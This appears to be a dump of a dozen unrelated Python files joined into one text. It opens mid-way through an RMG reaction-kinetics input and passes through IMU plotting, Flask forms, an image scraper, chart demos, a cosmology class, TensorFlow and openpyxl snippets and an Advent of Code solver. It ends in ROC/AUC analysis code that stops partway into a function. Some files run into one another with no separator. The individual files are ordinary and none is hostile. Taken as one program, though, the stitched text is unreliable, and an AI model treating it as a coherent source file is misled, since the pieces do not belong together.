family: intra_H_migration"""),
)
reaction(
label = 'reaction16',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['[CH2]CC([O])C(O)O(11584)'],
transitionState = 'TS16',
kinetics = Arrhenius(A=(1.2e+11,'s^-1'), n=0, Ea=(31.8402,'kJ/mol'), T0=(1,'K'), Tmin=(200,'K'), Tmax=(1000,'K'), comment="""From training reaction 306 used for R5H_CCC;O_rad_out;Cs_H_out_2H
Exact match found for rate rule [R5H_CCC;O_rad_out;Cs_H_out_2H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 3.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction17',
reactants = ['[O][CH]O(171)', 'CC[CH][O](563)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS17',
kinetics = Arrhenius(A=(7.46075e+06,'m^3/(mol*s)'), n=0.027223, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -14.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction18',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC(=O)C(O)O(11585)'],
transitionState = 'TS18',
kinetics = Arrhenius(A=(7.437e+08,'s^-1'), n=1.045, Ea=(63.4002,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3radExo;Y_rad;XH_Rrad]
Euclidian distance = 0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction19',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC(O)C(=O)O(11586)'],
transitionState = 'TS19',
kinetics = Arrhenius(A=(7.437e+08,'s^-1'), n=1.045, Ea=(63.4002,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3radExo;Y_rad;XH_Rrad]
Euclidian distance = 0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction20',
reactants = ['CH2(S)(23)', 'CC([O])C([O])O(1195)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS20',
kinetics = Arrhenius(A=(1.31021e+06,'m^3/(mol*s)'), n=0.189, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [carbene;C_pri] for rate rule [carbene;C_pri/NonDeC]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 3.0
family: 1,2_Insertion_carbene
Ea raised from -1.5 to 0 kJ/mol."""),
)
reaction(
label = 'reaction21',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC1OOC1O(11396)'],
transitionState = 'TS21',
kinetics = Arrhenius(A=(1.62e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4_SSS;Y_rad_out;Ypri_rad_out] for rate rule [R4_SSS;O_rad;Opri_rad]
Euclidian distance = 1.41421356237
family: Birad_recombination"""),
)
reaction(
label = 'reaction22',
reactants = ['CCC([O])[CH]OO(11587)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS22',
kinetics = Arrhenius(A=(4.263e+10,'s^-1'), n=0, Ea=(92.7451,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [RnOOH;C_rad_out_H/NonDeC] for rate rule [ROOH;C_rad_out_H/NonDeC]
Euclidian distance = 1.0
family: intra_OH_migration"""),
)
reaction(
label = 'reaction23',
reactants = ['CCC([CH][O])OO(11588)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS23',
kinetics = Arrhenius(A=(3.01978e+11,'s^-1'), n=0, Ea=(107.111,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R2OOH_S;Y_rad_out]
Euclidian distance = 0
family: intra_OH_migration"""),
)
reaction(
label = 'reaction24',
reactants = ['O(4)', 'CC[CH]C([O])O(4406)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS24',
kinetics = Arrhenius(A=(2085.55,'m^3/(mol*s)'), n=1.09077, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Y_rad;O_birad] for rate rule [C_rad/H/NonDeC;O_birad]
Euclidian distance = 3.0
family: Birad_R_Recombination
Ea raised from -8.3 to 0 kJ/mol."""),
)
reaction(
label = 'reaction25',
reactants = ['O(4)', 'CCC([O])[CH]O(10835)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS25',
kinetics = Arrhenius(A=(2085.55,'m^3/(mol*s)'), n=1.09077, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Y_rad;O_birad] for rate rule [C_rad/H/CsO;O_birad]
Euclidian distance = 4.0
family: Birad_R_Recombination
Ea raised from -8.3 to 0 kJ/mol."""),
)
# Pressure-dependent reaction network 2127: the unimolecular isomer(s) and
# the bimolecular channel(s) they connect to, plus the inert bath-gas mix.
network(
    label = '2127',
    # Unimolecular well(s) explored by the master equation.
    isomers = [
        'CCC([O])C([O])O(11392)',
    ],
    # Bimolecular source/sink channel(s).
    reactants = [
        ('HOCHO(59)', 'C2H5CHO(70)'),
    ],
    # Collider composition as mole fractions.
    bathGas = {
        'N2': 0.5,
        'Ne': 0.5,
    },
)
# Master-equation job settings used to fit k(T,P) for network 2127.
pressureDependence(
    label = '2127',
    # Temperature grid: 8 points spanning 300-2000 K.
    Tmin = (300,'K'),
    Tmax = (2000,'K'),
    Tcount = 8,
    Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'),
    # Pressure grid: 5 points spanning 0.01-100 bar.
    Pmin = (0.01,'bar'),
    Pmax = (100,'bar'),
    Pcount = 5,
    Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'),
    # Energy-grain discretization of the master equation.
    maximumGrainSize = (0.5,'kcal/mol'),
    minimumGrainCount = 250,
    # Reduction method and the k(T,P) interpolation model to fit.
    method = 'modified strong collision',
    interpolationModel = ('Chebyshev', 6, 4),
    activeKRotor = True,
    activeJRotor = True,
    rmgmode = True,
)
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 17 12:52:14 2020
@author: Mocki
E-mail : 605095234@qq.com
TO : Art is piece of luxury
"""
import matplotlib.pyplot as plt
from glv import *
class ChkData():
    """Quick-look plots for raw IMU data.

    Wraps an imu_data object exposing ``imu_mat(key)`` with keys "TIM"
    (timestamps), "ACC", "GYO" and "ALL".
    NOTE(review): assumes "ALL" returns time in column 0 followed by gyro
    x/y/z then accel x/y/z -- confirm against the imu_data implementation.
    """

    # Curve labels per data type; "ALL" drops the leading time column.
    _LABELS = {
        "ACC": ("ax", "ay", "az"),
        "GYO": ("gx", "gy", "gz"),
        "ALL": ("gx", "gy", "gz", "ax", "ay", "az"),
    }

    def __init__(self, imu_data):
        self.imu_chk = imu_data          # the IMU data source being checked
        self.intv = imu_data.intv        # sampling interval, copied for convenience

    def _plot(self, dtype, rebase):
        # Shared implementation for plot_timef/plot_epoch: the two originals
        # were copy-pasted and differed only in whether the time axis is
        # rebased to start at zero.
        fig = plt.figure(figsize=(10, 6))
        ax = fig.add_subplot(111)
        if dtype not in self._LABELS:
            raise Exception("Wrong dtype[%s]." % dtype)
        X = self.imu_chk.imu_mat("TIM")
        if rebase:
            X -= X[0]
        if dtype == "ALL":
            # Strip the time column; plot gyro then accel channels.
            Y = self.imu_chk.imu_mat("ALL")[:, 1:]
        else:
            Y = self.imu_chk.imu_mat(dtype)
        for col, label in enumerate(self._LABELS[dtype]):
            ax.plot(X, Y[:, col], label=label)
        ax.legend(loc="best")

    def plot_timef(self, dtype):
        """Plot the selected channels ("ACC", "GYO" or "ALL") against absolute time."""
        self._plot(dtype, rebase=False)

    def plot_epoch(self, dtype):
        """Plot the selected channels against time elapsed since the first sample."""
        self._plot(dtype, rebase=True)
class Chkalg():
    """Plot attitude-alignment results: time plus three Euler angles (radians)."""

    # Column index and curve label for each single-angle plot type.
    _SERIES = {"A": (1, "alpha"), "B": (2, "theta"), "F": (3, "fi")}

    def __init__(self, alg_mat):
        # alg_mat: column 0 = time, columns 1-3 = alpha/theta/fi in radians.
        self.alg_mat = alg_mat

    def plot(self, ptype):
        """Plot one angle ("A", "B", "F") or all three ("ALL"), in degrees.

        Fixes the original implementation, in which the single-angle
        branches computed X and Y but never drew anything (only the "ALL"
        branch actually called ax.plot), and unknown types failed silently.
        """
        fig = plt.figure(figsize=(10, 6))
        ax = fig.add_subplot(111)
        X = self.alg_mat[:, 0]
        if ptype in self._SERIES:
            col, label = self._SERIES[ptype]
            ax.plot(X, self.alg_mat[:, col] * R2D, label=label)
        elif ptype == "ALL":
            Y = self.alg_mat[:, 1:] * R2D
            for col, label in enumerate(("alpha", "theta", "fi")):
                ax.plot(X, Y[:, col], label=label)
        else:
            # The original silently produced an empty figure here.
            raise Exception("Wrong ptype[%s]." % ptype)
        ax.legend(loc="best")
|
import json
import os
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SelectField, SubmitField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo
from wtforms_alchemy import model_form_factory
from paul.models import User, Card
from paul import db
# Bind wtforms_alchemy's generated model forms to Flask-WTF's FlaskForm base.
BaseModelForm = model_form_factory(FlaskForm)
class ModelForm(BaseModelForm):
    """Base class for model-backed forms; supplies the SQLAlchemy session."""
    @classmethod
    def get_session(cls):
        # wtforms_alchemy calls this to introspect model metadata. It is a
        # classmethod, so the first parameter is the class itself (the
        # original misleadingly named it `self`).
        return db.session
# Load the tour metadata shipped with the package (static/tours.json).
# Use a context manager so the file handle is closed promptly -- the
# original open() was never closed.
_tours_path = os.path.join(os.path.dirname(__file__), 'static', 'tours.json')
with open(_tours_path, 'r') as _tours_file:
    tours = json.load(_tours_file)
class LoginForm(FlaskForm):
    """Sign-in form: username/password plus an optional remember-me flag."""
    username = StringField('Username', validators=[DataRequired()])
    password = PasswordField('Password', validators=[DataRequired()])
    remember_me = BooleanField('Remember Me')
    submit = SubmitField('Sign In')
class RegistrationForm(FlaskForm):
    """Sign-up form: credentials plus a missionary-tour selection.

    The validate_* methods follow WTForms' inline-validator convention and
    run automatically during form validation.
    """
    username = StringField('Username', validators=[DataRequired()])
    email = StringField('Email', validators=[DataRequired(), Email()])
    password = PasswordField('Password', validators=[DataRequired()])
    password2 = PasswordField(
        'Repeat Password', validators=[DataRequired(), EqualTo('password')])
    # NOTE(review): choices are hard-coded to '1'-'3' even though this module
    # loads `tours` from tours.json -- confirm whether they should stay in sync.
    sel_tour = SelectField('Select Missionary Tour', validators=[DataRequired()], choices=[(tour, 'Missionary Tour {}'.format(tour)) for tour in ['1', '2', '3']])
    submit = SubmitField('Register')
    def validate_username(self, username):
        """Reject usernames that already exist in the database."""
        user = User.query.filter_by(username=username.data).first()
        if user is not None:
            raise ValidationError('Please use a different username.')
    def validate_email(self, email):
        """Reject e-mail addresses that already exist in the database."""
        user = User.query.filter_by(email=email.data).first()
        if user is not None:
            raise ValidationError('Please use a different email address.')
class UserForm(ModelForm):
    """Edit form auto-generated from the User model by wtforms_alchemy."""
    class Meta:
        model = User
    submit = SubmitField('Save')
class CardForm(ModelForm):
    """Edit form auto-generated from the Card model by wtforms_alchemy."""
    class Meta:
        model = Card
    submit = SubmitField('Save')
import io
import requests
from PIL import Image
from bs4 import BeautifulSoup
import os

BASE_URL = "https://scraping-for-beginner.herokuapp.com"

# Fetch the practice page and collect every <img> tag on it.
res = requests.get(BASE_URL+"/image")
soup = BeautifulSoup(res.text, "html.parser")
img_tags = soup.find_all("img")

# Make sure the output directory exists before writing; the original
# crashed with FileNotFoundError when img/ was missing.
os.makedirs("img", exist_ok=True)

# Download each image and save it as img/sample_<i>.png.
for i, img_tag in enumerate(img_tags):
    img_url = BASE_URL + img_tag["src"]
    img = io.BytesIO(requests.get(img_url).content)  # url -> raw bytes
    img = Image.open(img)
    img.save(f"img/sample_{i}.png")
|
#!/usr/bin/python
from pychartdir import *
def createChart(chartIndex) :
    """Draw one demo horizontal linear meter and save it as a PNG.

    chartIndex (0-5) selects the bar style and color-scale variant; the
    image is written to blackhbarmeter<chartIndex>.png in the working
    directory.
    """
    # The value to display on the meter
    value = 75.35
    # Create a LinearMeter object of size 260 x 80 pixels with black background and rounded corners
    m = LinearMeter(260, 80, 0x000000)
    m.setRoundedFrame(Transparent)
    # Set the default text and line colors to white (0xffffff)
    m.setColor(TextColor, 0xffffff)
    m.setColor(LineColor, 0xffffff)
    # Set the scale region top-left corner at (15, 24), with size of 228 x 20 pixels. The scale
    # labels are located on the top (implies horizontal meter)
    m.setMeter(15, 24, 228, 20, Top)
    # Set meter scale from 0 - 100, with a tick every 10 units
    m.setScale(0, 100, 10)
    # Demonstrate different types of color scales
    smoothColorScale = [0, 0x0000ff, 25, 0x0088ff, 50, 0x00ff00, 75, 0xdddd00, 100, 0xff0000]
    stepColorScale = [0, 0x00dd00, 50, 0xffff00, 80, 0xff3333, 100]
    highLowColorScale = [0, 0x0000ff, 40, Transparent, 60, Transparent, 100, 0xff0000]
    highColorScale = [70, Transparent, 100, 0xff0000]
    if chartIndex == 0 :
        # Add a blue (0x0088ff) bar from 0 to value with glass effect and 4 pixel rounded corners
        m.addBar(0, value, 0x0088ff, glassEffect(NormalGlare, Top), 4)
        # Add a 5-pixel thick smooth color scale at y = 48 (below the meter scale)
        m.addColorScale(smoothColorScale, 48, 5)
    elif chartIndex == 1 :
        # Add a purple (0xaa66ff) bar from 0 to value
        m.addBar(0, value, 0xaa66ff)
        # Add a 4 pixel thick purple (0x880088) frame
        m.setThickFrame(4, 0x880088)
        # Add a 5-pixel thick high/low color scale at y = 48 (below the meter scale)
        m.addColorScale(highLowColorScale, 48, 5)
    elif chartIndex == 2 :
        # Add a green (0x00ee00) bar from 0 to value with right side soft lighting effect and 4
        # pixel rounded corners
        m.addBar(0, value, 0x00ee00, softLighting(Right), 4)
        # Add a 5-pixel thick step color scale at y = 48 (below the meter scale)
        m.addColorScale(stepColorScale, 48, 5)
    elif chartIndex == 3 :
        # Add an orange (0xff8800) bar from 0 to value with cylinder lighting effect
        m.addBar(0, value, 0xff8800, cylinderEffect())
        # Add a 4 pixel thick brown (0xbb5500) frame
        m.setThickFrame(4, 0xbb5500)
        # Add a 5-pixel thick high only color scale at y = 48 (below the meter scale)
        m.addColorScale(highColorScale, 48, 5)
    elif chartIndex == 4 :
        # Add a magenta (0xdd00dd) bar from 0 to value with top side soft lighting effect and 4
        # pixel rounded corners
        m.addBar(0, value, 0xdd00dd, softLighting(Top), 4)
        # Add a 5-pixel thick smooth color scale at y = 48 (below the meter scale)
        m.addColorScale(smoothColorScale, 48, 5)
    else :
        # Add a red (0xff0000) bar from 0 to value with bar lighting effect
        m.addBar(0, value, 0xff0000, barLighting())
        # Add a 4 pixel thick red (0xaa0000) frame
        m.setThickFrame(4, 0xaa0000)
        # Add a 5-pixel thick high/low color scale at y = 48 (below the meter scale)
        m.addColorScale(highLowColorScale, 48, 5)
    # Add a label left aligned to (12, 65) using 8pt Arial Bold font
    m.addText(12, 65, "Temperature C", "arialbd.ttf", 8, TextColor, Left)
    # Add a text box right aligned to (243, 65). Display the value using white (0xffffff) 8pt Arial
    # Bold font on a black (0x000000) background with depressed dark grey (0x333333) rounded border.
    t = m.addText(243, 65, m.formatValue(value, "2"), "arial.ttf", 8, 0xffffff, Right)
    t.setBackground(0x000000, 0x333333, -1)
    t.setRoundedCorners(3)
    # Output the chart
    m.makeChart("blackhbarmeter%s.png" % chartIndex)
# Render one meter image per demonstration style (indices 0-5).
for chart_index in range(6):
    createChart(chart_index)
|
__all__ = ("ConcentrationKlypin11",)
from . import Concentration
class ConcentrationKlypin11(Concentration):
    """Concentration-mass relation by `Klypin et al. 2011
    <https://arxiv.org/abs/1002.3660>`_. This parametrization is only
    valid for S.O. masses with :math:`\\Delta = \\Delta_{\\rm vir}`.
    Args:
        mass_def (:class:`~pyccl.halos.massdef.MassDef` or :obj:`str`): a mass
            definition object or a name string.
    """
    name = 'Klypin11'
    def __init__(self, *, mass_def="vir"):
        super().__init__(mass_def=mass_def)
    def _check_mass_def_strict(self, mass_def):
        # Returning True flags the mass definition as unsupported: this
        # relation is calibrated only for virial S.O. masses (presumably the
        # base class rejects definitions flagged here -- confirm upstream).
        return mass_def.name != "vir"
    def _concentration(self, cosmo, M, a):
        # c(M) = 9.6 * (M / M_pivot)^(-0.075) with M_pivot = 1e12 Msun/h
        # (assumes M is in Msun -- verify against the base-class contract).
        # Note: no explicit dependence on the scale factor `a`.
        M_pivot_inv = cosmo["h"] * 1E-12
        return 9.6 * (M * M_pivot_inv)**(-0.075)
|
#coding:utf8
import time
def req_IO():
    """Simulate a slow, blocking I/O call (5 s sleep) and return its result."""
    print("start_IO")
    time.sleep(5)
    print("IO_end")
    return "IOisEnd"
def req_a():
    """Handler A: performs the blocking fake-I/O request and reports its result."""
    print("start_A")
    io_result = req_IO()
    print("ret:%s" % io_result)
    print("A_end")
def req_b():
    """Handler B: does no I/O and finishes immediately."""
    for message in ("start_B", "end_B"):
        print(message)
def main():
    """Run both request handlers back to back."""
    # Simulate the tornado framework: a synchronous server handles requests
    # one at a time, so req_b must wait out req_a's 5-second fake I/O.
    req_a()
    req_b()
if __name__ == "__main__":
    main()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#cangye@hotmail.com
"""
=====================
sequence-loss
=====================
Helper demo for the cross-entropy sequence-loss function,
meant to simplify the programming flow.
(Header translated from the original Chinese.)
"""
import tensorflow as tf
import numpy as np
# Logits for 5 time steps over a 3-symbol vocabulary.
v1 = tf.constant([[1, 0, 0],
                  [0, 1, 0],
                  [0, 0, 1],
                  [0, 10, 0],
                  [1, 1, 1]], dtype=tf.float32)
# Target symbol index for each of the 5 steps.
v2 = tf.constant([1, 1, 1, 1, 1], dtype=tf.int32)
# Per-example cross-entropy loss with uniform (all-ones) weights.
# NOTE(review): tf.contrib was removed in TensorFlow 2.x; this requires TF 1.x.
loss = (tf.contrib
        .legacy_seq2seq
        .sequence_loss_by_example([v1],
                                  [v2],
                                  [tf.ones_like(v2, dtype=tf.float32)]))
sess = tf.Session()
print(sess.run(loss))
# [1.5514446e+00 5.5144465e-01 1.5514448e+00 9.0833353e-05 1.0986123e+00]
sess.close()
import openpyxl
# Create a workbook, rename the active sheet, write a header cell and two
# rows of sample data, then save it as mm.xlsx.
wb = openpyxl.Workbook()
sheet = wb.active
sheet.title = 'mm'
sheet['A1'] = '明明'
row = [['爬虫1','爬虫2','爬虫3'],['爬虫4','爬虫5','爬虫6']]
for i in row:
    # append() writes each inner list as the next worksheet row.
    sheet.append(i)
print(row)
wb.save("mm.xlsx")
from collections import deque
import copy
from hashlib import md5
from pathlib import Path
import time
import numpy as np
data_folder = Path(__file__).parent.resolve()
def shortest_path(passcode, grid_size=4):
    """Breadth-first search for the shortest door sequence to the vault.

    Returns the path string (e.g. "DDRRRD"), or None if the vault is
    unreachable for this passcode.
    """
    goal = (grid_size - 1, grid_size - 1)
    frontier = deque([((0, 0), "")])
    while frontier:
        position, route = frontier.pop()
        for candidate, step in _find_choices(position, route, passcode):
            # Discard moves that leave the grid.
            if min(candidate) < 0 or max(candidate) >= grid_size:
                continue
            if candidate == goal:
                # BFS order guarantees the first hit is shortest.
                return route + step
            frontier.appendleft((candidate, route + step))
    return None
def longest_path(passcode, grid_size=4):
    """Exhaustive search for the longest route length to the vault.

    Returns the number of steps of the longest route, or None when the
    vault cannot be reached at all.
    """
    goal = (grid_size - 1, grid_size - 1)
    frontier = deque([((0, 0), "")])
    best = 0
    while frontier:
        position, route = frontier.pop()
        for candidate, step in _find_choices(position, route, passcode):
            if min(candidate) < 0 or max(candidate) >= grid_size:
                continue
            if candidate == goal:
                # Route length including this final step is len(route) + 1.
                if len(route) >= best:
                    best = len(route) + 1
            else:
                # Routes stop at the vault; only non-goal moves continue.
                frontier.appendleft((candidate, route + step))
    return best if best else None
def _find_choices(point, path, passcode):
candidates = [
(point[0] - 1, point[1]),
(point[0] + 1, point[1]),
(point[0], point[1] - 1),
(point[0], point[1] + 1),
]
directions = ["U", "D", "L", "R"]
hashed_string = md5(f"{passcode}{path}".encode("utf-8")).hexdigest()
choices = list(zip(candidates, directions))
open_choices = []
for i in range(4):
if int(hashed_string[i], 16) > 10:
open_choices.append(choices[i])
return open_choices
def main():
    """Solve both puzzle parts for the fixed passcode."""
    passcode = "udskfozm"
    shortest = shortest_path(passcode)
    longest = longest_path(passcode)
    print("Part 1")
    print(f"The shortest path to reach the vault is {shortest}")
    print()
    print("Part 2")
    print(f"The longest path to reach the vault is {longest} steps")

if __name__ == "__main__":
    main()
|
from .base_types import *
from .simple_types import *
from .simple_containers import *
from .lazy import *
from .field_container import *
from .reference import *
|
import pandas as pd
from matplotlib import rcParams
import matplotlib.pyplot as plt
import numpy as np
import os
from sklearn.metrics import roc_auc_score, roc_curve
from sklearn.utils import resample
from inspect import signature
from delong import delong_roc_variance, delong_roc_test
from scipy import stats
def plotMultiPCR(trainpath, ext_testfiles, algo, rcut, her2, prefix='', output_folder=None):
    """Plot AUC vs. feature-set curves: training bands plus external validation.

    Args:
        trainpath: path to the multi-seed training results.
        ext_testfiles: dict with 'neg'/'pos' external test file prefixes.
        algo: kept for interface compatibility (unused here).
        rcut: response cut used to select the trained models.
        her2: 'agnost', 'neg' or 'pos' — HER2 stratification.
        prefix: kept for interface compatibility (unused here).
        output_folder: if given, the figure is saved there as a PDF.

    Returns:
        (train_pCR_means, test_pCR_bandnoms)
    """
    # Fixes vs. original: removed an unused local `import os`, merged the two
    # duplicated `if her2=='agnost'` branches, and used `is not None`.
    from aux_multiseed_training import getTrainingBands
    # Train
    train_pCR_means, train_pCR_std = getTrainingBands(trainpath, rcut, 'agnost', her2)
    print('Train band means:', train_pCR_means)
    print('Train band std:', train_pCR_std)
    ## Test
    test_pCR_bandmeans, test_pCR_bandsds, test_pCR_bandnoms = getWholeTestBand(ext_testfiles, rcut, her2, 'pCR')
    print('pCR from band noms:', test_pCR_bandnoms)
    print('pCR from band means:', test_pCR_bandmeans)

    fig0, ax0 = plt.subplots(1, 1, figsize=(7, 5))
    if her2 == 'agnost':
        # Draw training bands (mean +/- std over seeds).
        ax0.plot(range(6), train_pCR_means, ':', color='#20A39E')
        ax0.fill_between(range(6), train_pCR_means+train_pCR_std, train_pCR_means-train_pCR_std, alpha=0.1, color='#20A39E', label='Training')
        ax0.set_ylim([0.58, 0.93])
    else:
        ax0.set_title('HER2{} pCR'.format(her2))
    ax0.set_ylabel('AUC')
    plt.setp(ax0.get_xticklabels(), visible=True)
    plt.setp(ax0, xticks=range(6), xticklabels=['\nClinical','+\nDNA','+\nRNA','+\nDNA\nRNA','+\nDNA\nRNA\nDigPath','+\nDNA\nRNA\nDigPath\nTreatment'])
    ax0.plot(range(6), test_pCR_bandnoms, 'o-', color='#20A39E', label='External validation')
    # Bootstrap band around the external-validation curve.
    ax0.plot(range(6), test_pCR_bandmeans+test_pCR_bandsds, '-', color='#20A39E', alpha=0.9)
    ax0.plot(range(6), test_pCR_bandmeans-test_pCR_bandsds, '-', color='#20A39E', alpha=0.9)
    ax0.legend(loc='lower right', fontsize=14)
    if output_folder is not None:
        plt.savefig(output_folder+'/aucs_vs_feats_her2{}.pdf'.format(her2), bbox_inches='tight', transparent=True)
    return train_pCR_means, test_pCR_bandnoms
def getPreds(csv_file, model, feats, algo, rcut):
    """Load per-patient predictions and ground truth for one model config.

    The space-delimited file is keyed by (model-tag, row-type) in its first
    two columns with patient values after. Returns a DataFrame with columns
    ID / preds / truths.
    """
    df = pd.read_csv(csv_file, delimiter=' ', header=None)
    # Row 1 holds the patient identifiers.
    patIds = df.iloc[1, 2:-1].values
    df = df.iloc[:, :-1] # The last column is just nans
    truths = df[(df.loc[:,0]==model) & (df.loc[:,1]=='resp')].values[0][2:]
    preds = (df[(df.loc[:,0]=='{}_{}_r{}'.format(model, feats,rcut)) & (df.loc[:,1]==algo)]).values[0][2:]
    # NOTE(review): `x is not np.nan` is an *identity* test — it only filters
    # the np.nan singleton, not other NaN floats parsed from the file.
    # Confirm the values in these object rows really are that singleton.
    preds = np.array([float(x) for x in preds if x is not np.nan])
    truths = np.array([int(x) for x in truths if x is not np.nan])
    pred_df = pd.DataFrame({'ID':patIds, 'preds':preds, 'truths':truths})
    return pred_df
def testBands(testfiles, algo, rcut, her2, feats='rna', model='pCR'):
    """Bootstrapped external-validation AUC for one feature set.

    Averages per-patient predictions over the 5 training random seeds, then
    bootstraps the AUC with 100 stratified resamples.

    Returns:
        (mean bootstrap AUC, std bootstrap AUC, nominal AUC, [truths, preds])
    """
    itf = {}
    pred_dfs_forseeds = []
    for random_state in [1,2,3,4,5]:
        # Per-seed result folders for each HER2 stratum.
        itf['neg'] = testfiles['neg']+'_rs{}'.format(random_state)
        itf['pos'] = testfiles['pos']+'_rs{}'.format(random_state)
        if her2=='agnost':
            # HER2-agnostic: pool the neg and pos cohorts.
            pred_df_list = []
            for her2_i in ['neg', 'pos']:
                outputs_name = itf[her2_i]+'/predictions.txt'
                pred_df_i = getPreds(outputs_name, model, feats, algo, rcut)
                pred_df_list.append(pred_df_i)
            pred_df = pd.concat(pred_df_list).reset_index()
        else:
            outputs_name = itf[her2]+'/predictions.txt'
            pred_df = getPreds(outputs_name, model, feats, algo, rcut)
        pred_dfs_forseeds.append(pred_df)
    # Average the predictions of the 5 random seeds
    merged_df = pred_dfs_forseeds[0].copy()
    for ii in [1,2,3,4]:
        # Seed ii+1 columns get the suffix _rs{ii+1}; join on patient ID.
        suffix_df = pred_dfs_forseeds[ii].add_suffix('_rs{}'.format(ii+1))
        merged_df = pd.merge(merged_df, suffix_df, left_on='ID', right_on='ID_rs{}'.format(ii+1))
    series_final_truths = merged_df['truths']
    series_final_preds = (merged_df['preds']+merged_df['preds_rs2']+merged_df['preds_rs3']+merged_df['preds_rs4']+merged_df['preds_rs5'])/5
    merged_df['final_preds'] = series_final_preds
    truths = series_final_truths.values
    preds = series_final_preds.values
    nom_auc = roc_auc_score(truths, preds)
    # Bootstrapping
    indices = range(len(truths))
    bs_aucs = []
    for i in range(100):
        # Stratified resample keeps the class balance of `truths`.
        bs = resample(indices, replace=True, random_state=i, stratify=truths)
        auc = roc_auc_score(truths[bs], preds[bs])
        bs_aucs.append(auc)
    return np.mean(bs_aucs), np.std(bs_aucs), nom_auc, [truths,preds]
def getWholeTestBand(testfiles, rcut, her2, model, noBev=False):
    """Collect bootstrap AUC stats over all six feature sets.

    `noBev` is kept for interface compatibility (unused here).

    Returns:
        (means, sds, noms) — one np.array entry per feature set.
    """
    feature_sets = ['clinical', 'dna', 'clin_rna', 'rna', 'imag', 'chemo']
    stats = [testBands(testfiles, 'avg', rcut, her2, feats=f, model=model)[:3]
             for f in feature_sets]
    means, sds, noms = zip(*stats)
    return np.array(means), np.array(sds), np.array(noms)
def getROC(testfiles,rcut,her2,model,feats_list,names_list,output_folder=None,suffix=''):
    """Overlay ROC curves for several feature sets on one figure.

    `feats_list` and `names_list` must be the same length; at most 5
    curves are supported (length of `line_styles`). Saves a PDF when
    `output_folder` is given, then shows the figure.
    """
    plt.figure(figsize=(5,5))
    plt.plot([0,1],[0,1],':')  # chance diagonal
    line_styles = ['--','-','-.',':','-']
    for i,feats in enumerate(feats_list):
        # Only the pooled [truths, preds] are needed here.
        _,_,_,v = testBands(testfiles,'avg',rcut,her2,feats=feats,model=model)
        truths = v[0]
        preds = v[1]
        auc = roc_auc_score(truths, preds)
        label = '{} (Validation AUC={:.2f})'.format(names_list[i], auc)
        fpr, tpr, thresholds = roc_curve(truths, preds)
        plt.plot(fpr, tpr, color='k', lw=2, alpha=.8, linestyle=line_styles[i], label=label)
    plt.legend(fontsize=14, loc='lower right')
    plt.xlabel('FPR')
    plt.ylabel('TPR')
    if output_folder!=None:
        plt.savefig(output_folder+'/roc_her2{}{}.pdf'.format(her2,suffix), bbox_inches='tight', transparent=True)
    plt.show()
########### Precision - recall ##############
from sklearn.metrics import precision_recall_curve, average_precision_score, auc
def makeSinglePrec(theax, truths, preds, label, color):
    """Draw one precision-recall step curve (with fill) on the given axes."""
    precision, recall, thresholds = precision_recall_curve(truths, preds)
    avg_prec = average_precision_score(truths,preds)
    prec_auc = auc(recall, precision)
    print('Avg. prec = {}; AUC = {}'.format(avg_prec, prec_auc))
    # Older matplotlib versions lack the `step` kwarg on fill_between.
    step_kwargs = ({'step': 'post'} if 'step' in signature(plt.fill_between).parameters else {})
    theax.step(recall, precision, color=color, alpha=0.2, where='post')
    theax.fill_between(recall, precision, alpha=0.2, color=color, **step_kwargs, label=label)
def plotPrecRec(testfiles,rcut,her2,model,feats_list,names_list,output_folder=None):
    """Plot precision-recall curves for the given feature sets.

    NOTE(review): `colors` has two entries and the random-performance line
    is drawn when i==1 — this function appears to assume exactly two
    feature sets in `feats_list`; confirm with callers.
    """
    fig, ax = plt.subplots(1,1,figsize=(5,5))
    fig.subplots_adjust(hspace=0.4)
    colors = ['r','b']
    for i,feats in enumerate(feats_list):
        _,_,_,v = testBands(testfiles,'avg',rcut,her2,feats=feats,model=model)
        truths = v[0]
        preds = v[1]
        makeSinglePrec(ax, truths, preds, names_list[i], colors[i])
        if i==1:
            # Baseline precision = prevalence of the positive class.
            rand_perf = (truths==1).sum()/truths.shape[0]
            ax.plot([0, 1], [rand_perf, rand_perf], ':k')
            ax.text(0.01, rand_perf+0.02, 'Random performance', size=12)
    ax.legend(prop={'size': 12})
    ax.set_xlabel('Recall')
    ax.set_ylabel('Precision')
    if output_folder!=None:
        plt.savefig(output_folder+'/prec_recall_her2{}.pdf'.format(her2), bbox_inches='tight', transparent=True)
    plt.show()
########### DeLong p-values ############
def getLimits(y_true, y_pred):
